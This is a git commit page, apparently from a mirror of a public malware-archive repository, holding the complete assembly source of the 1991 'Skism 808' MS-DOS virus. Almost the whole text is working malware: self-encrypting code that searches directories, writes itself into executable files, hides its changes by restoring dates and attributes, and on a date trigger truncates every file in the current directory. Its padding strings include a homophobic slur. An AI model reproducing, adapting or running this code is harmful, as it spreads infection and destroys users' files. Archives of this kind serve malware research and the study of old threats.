daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
vxunderground
2021-01-12 17:29:01 -06:00
committed by GitHub
parent 60045f672b
commit 039994e413
86 changed files with 41158 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
MSDOS/Virus.MSDOS.Unknown.808.asm
+306
View File
@@ -0,0 +1,306 @@
;tHE sKISM 808 vIRUS. cREATED 1991 BY sMART kIDS iNTO sICK mETHODS.
FILENAME equ 30 ;USED TO FIND FILE NAME
FILEATTR equ 21 ;USED TO FIND FILE ATTRIBUTES
FILEDATE equ 24 ;USED TO FIND FILE DATE
FILETIME equ 22 ;USED TO FIND FILE TIME
CODE_START equ 0100H ;START OF ALL .com FILES
VIRUS_SIZE equ 808 ;tr 808
CODE SEGMENT 'CODE'
ASSUME CS:CODE,DS:CODE,ES:CODE
ORG CODE_START
MAIN PROC NEAR
JMP VIRUS_START
ENCRYPT_VAL DB 00H
VIRUS_START:
CALL ENCRYPT ;ENCRYPT/DECRYPT FILE
JMP VIRUS ;GO TO START OF CODE
ENCRYPT:
PUSH CX
MOV BX,OFFSET VIRUS_CODE ;START ENCRYPTION AT DATA
XOR_LOOP:
MOV CH,[BX] ;READ CURRENT BYTE
XOR CH,ENCRYPT_VAL ;GET ENCRYPTION KEY
MOV [BX],CH ;SWITCH BYTES
INC BX ;MOVE BX UP A BYTE
CMP BX,OFFSET VIRUS_CODE+VIRUS_SIZE
;ARE WE DONE WITH THE ENCRYPTION
JLE XOR_LOOP ;NO? KEEP GOING
POP CX
RET
INFECTFILE:
MOV DX,CODE_START ;WHERE VIRUS STARTS IN MEMORY
MOV BX,HANDLE ;LOAD BX WITH HANDLE
PUSH BX ;SAVE HANDLE ON STACK
CALL ENCRYPT ;ENCRYPT FILE
POP BX ;GET BACK BX
MOV CX,VIRUS_SIZE ;NUMBER OF BYTES TO WRITE
MOV AH,40H ;WRITE TO FILE
INT 21H ;
PUSH BX
CALL ENCRYPT ;FIX UP THE MESS
POP BX
RET
VIRUS_CODE:
WILDCARDS DB "*",0 ;SEARCH FOR DIRECTORY ARGUMENT
FILESPEC DB "*.exe",0 ;SEARCH FOR exe FILE ARGUMENT
FILESPEC2 DB "*.*",0
ROOTDIR DB "\",0 ;ARGUMENT FOR ROOT DIRECTORY
DIRDATA DB 43 DUP (?) ;HOLDS DIRECTORY dta
FILEDATA DB 43 DUP (?) ;HOLDS FILES dta
DISKDTASEG DW ? ;HOLDS DISK DTA SEGMENT
DISKDTAOFS DW ? ;HOLDS DISK DTA OFFSET
TEMPOFS DW ? ;HOLDS OFFSET
TEMPSEG DW ? ;HOLDS SEGMENT
DRIVECODE DB ? ;HOLDS DRIVE CODE
CURRENTDIR DB 64 DUP (?) ;SAVE CURRENT DIRECTORY INTO THIS
HANDLE DW ? ;HOLDS FILE HANDLE
ORIG_TIME DW ? ;HOLDS FILE TIME
ORIG_DATE DW ? ;HOLDS FILE DATE
ORIG_ATTR DW ? ;HOLDS FILE ATTR
IDBUFFER DW 2 DUP (?) ;HOLDS VIRUS ID
VIRUS:
MOV AX,3000H ;GET DOS VERSION
INT 21H ;
CMP AL,02H ;IS IT AT LEAST 2.00?
JB BUS1 ;WON'T INFECT LESS THAN 2.00
MOV AH,2CH ;GET TIME
INT 21H ;
MOV ENCRYPT_VAL,DL ;SAVE M_SECONDS TO ENCRYPT VAL SO
;THERES 100 MUTATIONS POSSIBLE
SETDTA:
MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA
MOV AH,1AH ;SET DTA ADDRESS
INT 21H ;
NEWDIR:
MOV AH,19H ;GET DRIVE CODE
INT 21H ;
MOV DL,AL ;SAVE DRIVECODE
INC DL ;ADD ONE TO DL, BECAUSE FUNCTIONS DIFFER
MOV AH,47H ;GET CURRENT DIRECTORY
MOV SI, OFFSET CURRENTDIR ;BUFFER TO SAVE DIRECTORY IN
INT 21H ;
MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY
MOV AH,3BH ;CHANGE DIRECTORY TO ROOT
INT 21H ;
SCANDIRS:
MOV CX,13H ;INCLUDE HIDDEN/RO DIRECTORYS
MOV DX, OFFSET WILDCARDS ;LOOK FOR '*'
MOV AH,4EH ;FIND FIRST FILE
INT 21H ;
CMP AX,12H ;NO FIRST FILE?
JNE DIRLOOP ;NO DIRS FOUND? BAIL OUT
BUS1:
JMP BUS
DIRLOOP:
MOV AH,4FH ;FIND NEXT FILE
INT 21H ;
CMP AX,12H
JE BUS ;NO MORE DIRS FOUND, ROLL OUT
CHDIR:
MOV DX,OFFSET DIRDATA+FILENAME;POINT DX TO FCB - FILENAME
MOV AH,3BH ;CHANGE DIRECTORY
INT 21H ;
MOV AH,2FH ;GET CURRENT DTA ADDRESS
INT 21H ;
MOV [DISKDTASEG],ES ;SAVE OLD SEGMENT
MOV [DISKDTAOFS],BX ;SAVE OLD OFFSET
MOV DX,OFFSET FILEDATA ;OFFSET OF WHERE TO HOLD NEW DTA
MOV AH,1AH ;SET DTA ADDRESS
INT 21H ;
SCANDIR:
MOV CX,07H ;FIND ANY ATTRIBUTE
MOV DX,OFFSET FILESPEC ;POINT DX TO "*.com",0
MOV AH,4EH ;FIND FIRST FILE FUNCTION
INT 21H ;
CMP AX,12H ;WAS FILE FOUND?
JNE TRANSFORM
NEXTEXE:
MOV AH,4FH ;FIND NEXT FILE
INT 21H ;
CMP AX,12H ;NONE FOUND
JNE TRANSFORM ;FOUND SEE WHAT WE CAN DO
MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY
MOV AH,3BH ;CHANGE DIRECTORY TO ROOT
INT 21H ;
MOV AH,1AH ;SET DTA ADDRESS
MOV DS,[DISKDTASEG] ;RESTORE OLD SEGMENT
MOV DX,[DISKDTAOFS] ;RESTORE OLD OFFSET
INT 21H ;
JMP DIRLOOP
BUS:
JMP ROLLOUT
TRANSFORM:
MOV AH,2FH ;TEMPORALLY STORE DTA
INT 21H ;
MOV [TEMPSEG],ES ;SAVE OLD SEGMENT
MOV [TEMPOFS],BX ;SAVE OLD OFFSET
MOV DX, OFFSET FILEDATA + FILENAME
MOV BX,OFFSET FILEDATA ;SAVE FILE...
MOV AX,[BX]+FILEDATE ;DATE
MOV ORIG_DATE,AX ;
MOV AX,[BX]+FILETIME ;TIME
MOV ORIG_TIME,AX ; AND
MOV AX,[BX]+FILEATTR ;
MOV AX,4300H
INT 21H
MOV ORIG_ATTR,CX
MOV AX,4301H ;CHANGE ATTRIBUTES
XOR CX,CX ;CLEAR ATTRIBUTES
INT 21H ;
MOV AX,3D00H ;OPEN FILE - READ
INT 21H ;
JC FIXUP ;ERROR - FIND ANOTHER FILE
MOV HANDLE,AX ;SAVE HANDLE
MOV AH,3FH ;READ FROM FILE
MOV BX,HANDLE ;MOVE HANDLE TO BX
MOV CX,02H ;READ 2 BYTES
MOV DX,OFFSET IDBUFFER ;SAVE TO BUFFER
INT 21H ;
MOV AH,3EH ;CLOSE FILE FOR NOW
MOV BX,HANDLE ;LOAD BX WITH HANDLE
INT 21H ;
MOV BX, IDBUFFER ;FILL BX WITH ID STRING
CMP BX,02EBH ;INFECTED?
JNE DOIT ;SAME - FIND ANOTHER FILE
FIXUP:
MOV AH,1AH ;SET DTA ADDRESS
MOV DS,[TEMPSEG] ;RESTORE OLD SEGMENT
MOV DX,[TEMPOFS] ;RESTORE OLD OFFSET
INT 21H ;
JMP NEXTEXE
DOIT:
MOV DX, OFFSET FILEDATA + FILENAME
MOV AX,3D02H ;OPEN FILE READ/WRITE ACCESS
INT 21H ;
MOV HANDLE,AX ;SAVE HANDLE
CALL INFECTFILE
;MOV AX,3EH ;CLOSE FILE
;INT 21H
ROLLOUT:
MOV AX,5701H ;RESTORE ORIGINAL
MOV BX,HANDLE ;
MOV CX,ORIG_TIME ;TIME AND
MOV DX,ORIG_DATE ;DATE
INT 21H ;
MOV AX,4301H ;RESTORE ORIGINAL ATTRIBUTES
MOV CX,ORIG_ATTR
MOV DX,OFFSET FILEDATA + FILENAME
INT 21H
;MOV BX,HANDLE
;MOV AX,3EH ;CLOSE FILE
;INT 21H
MOV AH,3BH ;TRY TO FIX THIS
MOV DX,OFFSET ROOTDIR ;FOR SPEED
INT 21H ;
MOV AH,3BH ;CHANGE DIRECTORY
MOV DX,OFFSET CURRENTDIR ;BACK TO ORIGINAL
INT 21H ;
MOV AH,2AH ;CHECK SYSTEM DATE
INT 21H ;
CMP CX,1991 ;IS IT AT LEAST 1991?
JB AUDI ;NO? DON'T DO IT NOW
CMP DL,25 ;IS IT THE 25TH?
JB AUDI ;NOT YET? QUIT
CMP AL,5 ;IS fRIDAY?
JNE AUDI ;NO? QUIT
MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA
MOV AH,1AH ;SET DTA ADDRESS
INT 21H ;
MOV AH,4EH ;FIND FIRST FILE
MOV CX,7H ;
MOV DX,OFFSET FILESPEC2 ;OFFSET *.*
lOOPS:
INT 21H ;
JC AUDI ;ERROR? THEN QUIT
MOV AX,4301H ;FIND ALL NORMAL FILES
XOR CX,CX ;
INT 21H ;
MOV DX,OFFSET DIRDATA + FILENAME
MOV AH,3CH ;FUCK UP ALL FILES IN CURRENT DIR
INT 21H ;
JC AUDI ;ERROR? QUIT
MOV AH,4FH ;FIND NEXT FILE
JMP LOOPS ;
AUDI:
MOV AX,4C00H ;END PROGRAM
INT 21H ;
;tHE BELOW IS JUST TEXT TO PAD OUT THE VIRUS SIZE TO 808 BYTES. dON'T
;JUST CHANGE THE TEXT AND CLAIM THAT THIS IS YOUR CREATION.
WORDS_ DB "sKISM rYTHEM sTACK vIRUS-808. sMART kIDS iNTO sICK mETHODS",0
WORDS2 DB " dONT ALTER THIS CODE INTO YOUR OWN STRAIN, FAGGIT. ",0
WORDS3 DB " hr/sss nycITY, THIS IS THE FIFTH OF MANY, MANY MORE....",0
WORDS4 DB " yOU SISSYS.....",0
MAIN ENDP
CODE ENDS
END MAIN